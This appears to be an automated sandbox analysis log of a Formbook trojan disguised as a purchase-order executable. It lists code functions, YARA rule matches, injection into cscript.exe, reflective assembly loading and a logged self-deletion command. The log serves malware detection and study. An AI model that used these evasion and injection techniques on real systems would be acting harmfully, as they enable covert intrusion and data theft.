          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F1B1B04_2_04F1B1B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FDB16B4_2_04FDB16B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F4516C4_2_04F4516C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EFF1724_2_04EFF172
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2D2F04_2_04F2D2F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FB12ED4_2_04FB12ED
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2B2C04_2_04F2B2C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F152A04_2_04F152A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F5739A4_2_04F5739A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04EFD34C4_2_04EFD34C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC132D4_2_04FC132D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFCF24_2_04FCFCF2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F89C324_2_04F89C32
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2FDC04_2_04F2FDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC7D734_2_04FC7D73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC1D5A4_2_04FC1D5A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F13D404_2_04F13D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F19EB04_2_04F19EB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFFB14_2_04FCFFB1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F11F924_2_04F11F92
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFF094_2_04FCFF09
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F138E04_2_04F138E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F7D8004_2_04F7D800
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F199504_2_04F19950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2B9504_2_04F2B950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FA59104_2_04FA5910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FBDAC64_2_04FBDAC6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F55AA04_2_04F55AA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FADAAC4_2_04FADAAC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F83A6C4_2_04F83A6C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFA494_2_04FCFA49
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FC7A464_2_04FC7A46
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F85BF04_2_04F85BF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F4DBF94_2_04F4DBF9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F2FB804_2_04F2FB80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04FCFB764_2_04FCFB76
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE2664_2_02DBE266
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE1E54_2_02DBE1E5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE5B44_2_02DBE5B4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD5A34_2_02DBD5A3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDAE64_2_02DBDAE6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDB924_2_02DBDB92
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDEB94_2_02DBDEB9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA9E604_2_02DA9E60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2FB04_2_02DA2FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2D904_2_02DA2D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBDD874_2_02DBDD87
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 017AEA12 appears 86 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 01775130 appears 58 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 017BF290 appears 103 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 0172B970 appears 262 times
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: String function: 01787E54 appears 107 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F57E54 appears 97 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F7EA12 appears 86 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04EFB970 appears 257 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F45130 appears 57 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04F8F290 appears 103 times
          Source: Purchase Order#23113.exe, Static PE information: invalid certificate
          Source: Purchase Order#23113.exe, 00000000.00000002.1770060059.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000002.1775578498.0000000007F30000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000000.00000000.1739634312.0000000000CFE000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameeGGj.exeX vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecscript.exe` vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenamecscript.exe` vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, 00000002.00000002.1819753451.000000000182D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order#23113.exe
          Source: Purchase Order#23113.exe, Binary or memory string: OriginalFilenameeGGj.exeX vs Purchase Order#23113.exe
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: version.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Section loaded: windowscodecs.dll
          Source: C:\Windows\explorer.exe, Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\SysWOW64\cscript.exe, Section loaded: version.dll
          Source: C:\Windows\SysWOW64\cscript.exe, Section loaded: wininet.dll
          Source: Purchase Order#23113.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cscript.exe PID: 1068, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Purchase Order#23113.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, lIDZBrdERDDgYaKjKV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, lIDZBrdERDDgYaKjKV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Purchase Order#23113.exe.3121198.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Purchase Order#23113.exe.3050000.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Purchase Order#23113.exe.31291b0.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@11/8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,__alloca_probe_16,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,4_2_0070BCDF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007064E0 CLSIDFromString,CoCreateInstance,4_2_007064E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_007182B5 FindResourceExW,LoadResource,4_2_007182B5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order#23113.exe.log
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
          Source: Purchase Order#23113.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Purchase Order#23113.exeReversingLabs: Detection: 31%
          Source: Purchase Order#23113.exeVirustotal: Detection: 39%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Purchase Order#23113.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Purchase Order#23113.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order#23113.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Purchase Order#23113.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cscript.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eGGj.pdb source: Purchase Order#23113.exe
          Source: Binary string: eGGj.pdbSHA256 source: Purchase Order#23113.exe
          Source: Binary string: wntdll.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order#23113.exe, Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, bCOwRu2KKHfkUO1AB6.cs.Net Code: zr2N4DGMKR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack, bCOwRu2KKHfkUO1AB6.cs.Net Code: zr2N4DGMKR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, -Module-.cs.Net Code: _200E_200E_206B_200B_206D_200F_200F_200C_200E_202B_202C_200D_200F_202C_202E_202B_206F_206D_202E_200B_202D_206B_202E_202C_202C_202B_206A_206C_202A_206B_200D_202C_202B_202B_206E_206E_206C_206E_206C_206F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, Dill.cs.Net Code: _200D_200B_202A_200F_200E_202D_202C_206D_200E_202E_200B_200F_206C_202D_202A_202C_202E_206B_200B_206A_206E_206C_202D_200F_200D_200D_206D_200D_202A_202B_206E_206F_202A_206D_202E_206D_200E_206C_200D_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: Purchase Order#23113.exeStatic PE information: 0xDB3AE2F9 [Sun Jul 21 05:58:17 2086 UTC]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070AA82 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_0070AA82
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_0142F590 pushfd ; iretd 0_2_0142F599
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 0_2_05B631E7 push ds; iretd 0_2_05B631FF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00417090 pushad ; iretd 2_2_00417096
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041E266 push E89010BFh; ret 2_2_0041E582
